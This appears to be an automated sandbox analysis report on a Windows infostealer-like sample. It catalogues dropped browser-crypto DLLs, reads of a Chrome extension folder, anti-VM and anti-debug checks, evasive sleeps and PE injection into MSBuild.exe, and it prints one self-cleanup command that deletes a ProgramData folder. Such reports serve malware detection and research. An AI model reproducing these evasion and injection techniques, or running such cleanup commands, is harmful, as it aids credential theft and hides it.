Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\EHDHIDAEHC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003E7A40

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\ProgramData\EHDHIDAEHC.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory allocated: 4E60000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\ProgramData\EHDHIDAEHC.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

API coverage: 9.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\ProgramData\EHDHIDAEHC.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2208	Thread sleep count: 78 > 30			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D1110
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_003D99F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E5EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003E5EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003DC2E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_003DA2C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E56C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_003E56C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003DB390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E4F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_003E4F80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D9D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D9D40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E5A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_003E5A70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_003DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	6_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040B390

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E53C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_003E53C0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DFDA0 GetSystemInfo,wsprintfA,

0_2_003DFDA0

Source: C:\ProgramData\EHDHIDAEHC.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr	Binary or memory string: EZCZTtShhMhGfSxfdfH
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWE
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003220000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000031BE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware8p

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	API call chain: ExitProcess graph end node			graph_0-71598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003ED12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_003ED12F

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003D2000 VirtualProtect 00000000,00000004,00000100,?

0_2_003D2000

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003E7A40

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E76E0 mov eax, dword ptr fs:[00000030h]		0_2_003E76E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004176E0 mov eax, dword ptr fs:[00000030h]		6_2_004176E0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E0420 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,wsprintfA,lstrcatA,GetCurrentHwProfileA,lstrlenA,lstrcatA,

0_2_003E0420

Enables debug privileges

Source: C:\ProgramData\EHDHIDAEHC.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003EECC8 SetUnhandledExceptionFilter,	0_2_003EECC8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003ED12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003ED12F
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003ECAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003ECAF5
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C2CB66C
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C2CB1F7
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C47AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C47AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041ECC8 SetUnhandledExceptionFilter,	6_2_0041ECC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0041D12F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0041CAF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE142AF SetUnhandledExceptionFilter,	6_2_1FE142AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE12C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1FE12C8E

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\ProgramData\EHDHIDAEHC.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003DED80

Injects a PE file into a foreign processes

Source: C:\ProgramData\EHDHIDAEHC.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E1400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,	0_2_003E1400
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E12F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_003E12F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	6_2_00411400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	6_2_004112F0

Writes to foreign memory regions

Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63D000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D06008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Contains functionality to query CPU information (cpuid)

